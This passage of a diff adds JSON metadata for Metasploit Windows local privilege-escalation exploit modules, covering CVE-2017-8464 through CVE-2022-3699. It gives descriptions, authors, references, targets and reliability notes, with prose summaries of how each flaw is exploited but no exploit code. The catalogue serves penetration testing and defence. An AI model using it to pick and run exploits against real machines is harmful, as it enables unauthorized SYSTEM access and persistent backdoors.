"rank": 500, + "disclosure_date": "2017-06-13", + "type": "exploit", + "author": [ + "Uncredited", + "Yorick Koster", + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.", + "references": [ + "CVE-2017-8464", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", + "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", + "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", + "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", + "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64", + "Windows x86" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2017_8464_lnk_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2018_8453_win32k_priv_esc": { + "name": "Windows 
NtUserSetWindowFNID Win32k User Callback", + "fullname": "exploit/windows/local/cve_2018_8453_win32k_priv_esc", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-09", + "type": "exploit", + "author": [ + "ze0r", + "Kaspersky Lab", + "Jacob Robles" + ], + "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component\n fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\"\n This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows\n Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,\n Windows 10, Windows 10 Servers.\n This module is tested against Windows 10 v1703 x86.", + "references": [ + "CVE-2018-8453", + "URL-https://github.com/ze0r/cve-2018-8453-exp", + "URL-https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig", + "URL-https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ", + "URL-https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1703 (Build 15063) x86" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2018_8453_win32k_priv_esc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2019_1458_wizardopium": { + "name": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2019_1458_wizardopium", + 
"aliases": [], + "rank": 300, + "disclosure_date": "2019-12-10", + "type": "exploit", + "author": [ + "piotrflorczyk", + "unamer", + "timwr" + ], + "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.", + "references": [ + "CVE-2019-1458", + "URL-https://github.com/unamer/CVE-2019-1458", + "URL-https://github.com/piotrflorczyk/cve-2019-1458_POC", + "URL-https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", + "URL-https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2019_1458_wizardopium", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_0668_service_tracing": { + "name": "Service Tracing Privilege Elevation Vulnerability", + 
"fullname": "exploit/windows/local/cve_2020_0668_service_tracing", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-11", + "type": "exploit", + "author": [ + "itm4n", + "bwatters-r7" + ], + "description": "This module leverages a trusted file overwrite with a DLL hijacking\n vulnerability to gain SYSTEM-level access on vulnerable Windows 10 x64\n targets.", + "references": [ + "CVE-2020-0668", + "URL-https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/", + "URL-https://github.com/itm4n/SysTracingPoc", + "URL-https://github.com/RedCursorSecurityConsulting/CVE-2020-0668", + "PACKETSTORM-156576", + "URL-https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a", + "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2024-12-12 17:11:53 +0000", + "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_0668_service_tracing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2020_0787_bits_arbitrary_file_move": { + "name": "Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-03-10", + "type": "exploit", + "author": [ + "itm4n", + "gwillcox-r7" + ], + "description": "This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background 
Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.", + "references": [ + "CVE-2020-0787", + "URL-https://itm4n.github.io/cve-2020-0787-windows-bits-eop/", + "URL-https://github.com/itm4n/BitsArbitraryFileMove", + "URL-https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8", + "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "URL-https://itm4n.github.io/usodllloader-part1/", + "URL-https://itm4n.github.io/usodllloader-part2/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows DLL Dropper" + ], + "mod_time": "2024-02-07 11:20:12 +0000", + "path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2020_0796_smbghost": { + "name": "SMBv3 Compression Buffer Overflow", + "fullname": 
"exploit/windows/local/cve_2020_0796_smbghost", + "aliases": [], + "rank": 400, + "disclosure_date": "2020-03-13", + "type": "exploit", + "author": [ + "Daniel García Gutiérrez", + "Manuel Blanco Parajón", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.", + "references": [ + "CVE-2020-0796", + "URL-https://github.com/danigargu/CVE-2020-0796", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1903-1909 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_0796_smbghost", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "SMBGhost", + "CoronaBlue" + ], + "Stability": [ + "crash-os-restarts" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "RelatedModules": [ + "exploit/windows/smb/cve_2020_0796_smbghost" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1048_printerdemon": { + "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_1048_printerdemon", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-11-04", + "type": "exploit", + "author": [ + "Yarden Shafir", + "Alex Ionescu", + "shubham0d", + "bwatters-r7" + ], + "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. 
Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. Essentially, on default settings, this module\n adds a permanent elevated backdoor.", + "references": [ + "CVE-2020-1048", + "URL-https://windows-internals.com/printdemon-cve-2020-1048/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1048_printerdemon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1054_drawiconex_lpe": { + "name": "Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2020_1054_drawiconex_lpe", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-02-20", + "type": "exploit", + "author": [ + "Netanel Ben-Simon", + "Yoav Alon", + "bee13oy", + "timwr" + ], + "description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n within win32k. The out of bounds write can be used to overwrite the pvbits of a\n SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n This module has been tested against a fully updated Windows 7 x64 SP1. 
Offsets\n within the exploit code may need to be adjusted to work with other versions of\n Windows.", + "references": [ + "CVE-2020-1054", + "URL-https://cpr-zero.checkpoint.com/vulns/cprid-2153/", + "URL-https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html", + "URL-https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp", + "URL-https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp", + "URL-https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1054_drawiconex_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1313_system_orchestrator": { + "name": "Windows Update Orchestrator unchecked ScheduleWork call", + "fullname": "exploit/windows/local/cve_2020_1313_system_orchestrator", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-11-04", + "type": "exploit", + "author": [ + "Imre Rad", + "bwatters-r7" + ], + "description": "This exploit uses access to the UniversalOrchestrator ScheduleWork API call\n which does not verify the caller's token before scheduling a job to be run\n as SYSTEM. 
You cannot schedule something in a given time, so the payload will\n execute as system sometime in the next 24 hours.", + "references": [ + "CVE-2020-1313", + "URL-https://github.com/irsl/CVE-2020-1313" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1313_system_orchestrator", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1337_printerdemon": { + "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_1337_printerdemon", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-11-04", + "type": "exploit", + "author": [ + "Peleg Hadar", + "Tomer Bar", + "404death", + "sailay1996", + "bwatters-r7" + ], + "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. 
Essentially, on default settings, this module\n adds a permanent elevated backdoor.", + "references": [ + "CVE-2020-1337", + "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337", + "URL-https://github.com/sailay1996/cve-2020-1337-poc", + "URL-https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1337_printerdemon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_17136": { + "name": "CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP", + "fullname": "exploit/windows/local/cve_2020_17136", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-03-10", + "type": "exploit", + "author": [ + "James Foreshaw", + "Grant Willcox" + ], + "description": "The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. 
This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.", + "references": [ + "CVE-2020-17136", + "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=2082", + "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows DLL Dropper" + ], + "mod_time": "2024-02-07 11:25:41 +0000", + "path": "/modules/exploits/windows/local/cve_2020_17136.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_17136", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2021_21551_dbutil_memmove": { + "name": "Dell DBUtil_2_3.sys IOCTL memmove", + "fullname": "exploit/windows/local/cve_2021_21551_dbutil_memmove", + "aliases": [], + "rank": 400, + "disclosure_date": "2021-05-04", + "type": "exploit", + "author": [ + "Kasif Dekel", + "SentinelLabs", + "Spencer McIntyre" + ], + "description": "The DBUtil_2_3.sys driver distributed by 
Dell exposes an unprotected IOCTL interface that can be abused by\n an attacker read and write kernel-mode memory.", + "references": [ + "CVE-2021-21551", + "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "URL-https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2021_21551_dbutil_memmove", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2021_40449": { + "name": "Win32k NtGdiResetDC Use After Free Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2021_40449", + "aliases": [], + "rank": 400, + "disclosure_date": "2021-10-12", + "type": "exploit", + "author": [ + "IronHusky", + "Costin Raiu", + "Boris Larin", + "Red Raindrop Team of Qi'anxin Threat Intelligence Center", + "KaLendsi", + "ly4k", + "Grant Willcox" + ], + "description": "A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by\n an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact\n that this function calls `hdcOpenDCW()`, which performs a user mode callback. 
During this callback, attackers\n can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object\n that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle\n with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the\n attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the\n kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM.\n\n This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions\n of Windows 10 will likely also work.", + "references": [ + "CVE-2021-40449", + "URL-https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/", + "URL-https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ", + "URL-https://github.com/KaLendsi/CVE-2021-40449-Exploit", + "URL-https://github.com/ly4k/CallbackHell" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)" + ], + "mod_time": "2024-02-07 11:28:00 +0000", + "path": "/modules/exploits/windows/local/cve_2021_40449.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2021_40449", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2022_21882_win32k": { + "name": "Win32k ConsoleControl Offset Confusion", + "fullname": "exploit/windows/local/cve_2022_21882_win32k", + "aliases": [ + "exploit/windows/local/cve_2021_1732_win32k" + ], + "rank": 200, + "disclosure_date": "2021-02-09", 
+ "type": "exploit", + "author": [ + "BITTER APT", + "JinQuan", + "MaDongZe", + "TuXiaoYi", + "LiHao", + "L4ys", + "KaLendsi", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.", + "references": [ + "CVE-2021-1732", + "URL-https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/", + "URL-https://github.com/KaLendsi/CVE-2021-1732-Exploit", + "URL-https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e", + "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732", + "URL-https://www.fuzzysecurity.com/tutorials/expDev/22.html", + "URL-https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm", + "URL-https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html", + "URL-https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html", + "CVE-2022-21882", + "URL-https://github.com/L4ys/CVE-2022-21882", + "URL-https://github.com/KaLendsi/CVE-2022-21882" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 
v1803-21H2 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2022_21882_win32k.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_21882_win32k", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2022_21999_spoolfool_privesc": { + "name": "CVE-2022-21999 SpoolFool Privesc", + "fullname": "exploit/windows/local/cve_2022_21999_spoolfool_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-02-08", + "type": "exploit", + "author": [ + "Oliver Lyak", + "Shelby Pace" + ], + "description": "The Windows Print Spooler has a privilege escalation vulnerability that\n can be leveraged to achieve code execution as SYSTEM.\n\n The `SpoolDirectory`, a configuration setting that holds the path that\n a printer's spooled jobs are sent to, is writable for all users, and it can\n be configured via `SetPrinterDataEx()` provided the caller has the\n `PRINTER_ACCESS_ADMINISTER` permission. 
If the `SpoolDirectory` path does not\n exist, it will be created once the print spooler reinitializes.\n\n Calling `SetPrinterDataEx()` with the `CopyFiles\\` registry key will load the\n dll passed in as the `pData` argument, meaning that writing a dll to the `SpoolDirectory`\n location can be loaded by the print spooler.\n\n Using a directory junction and UNC path for the `SpoolDirectory`, the exploit\n writes a payload to `C:\\Windows\\System32\\spool\\drivers\\x64\\4` and loads it\n by calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM.", + "references": [ + "URL-https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81", + "CVE-2022-21999" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Auto" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_21999_spoolfool_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "SpoolFool" + ], + "Stability": [ + "crash-service-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2022_26904_superprofile": { + "name": "User Profile Arbitrary Junction Creation Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2022_26904_superprofile", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-03-17", + "type": "exploit", + "author": [ + "KLINIX5", + "Grant Willcox" + ], + "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory 
structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. 
Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.", + "references": [ + "CVE-2022-26904", + "URL-https://github.com/rmusser01/SuperProfile", + "URL-https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html", + "URL-https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 11" + ], + "mod_time": "2024-02-07 11:30:42 +0000", + "path": "/modules/exploits/windows/local/cve_2022_26904_superprofile.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_26904_superprofile", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "screen-effects", + "audio-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver": { + "name": "Lenovo Diagnostics Driver IOCTL memmove", + "fullname": "exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver", + "aliases": [], + "rank": 400, + "disclosure_date": "2022-11-09", + "type": "exploit", + "author": [ + "alfarom256", + "jheysel-r7" + ], + "description": "Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to\n issue device IOCTLs to perform arbitrary physical/virtual memory read/write.", + "references": [ + "CVE-2022-3699", + "URL-https://github.com/alfarom256/CVE-2022-3699/" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + 
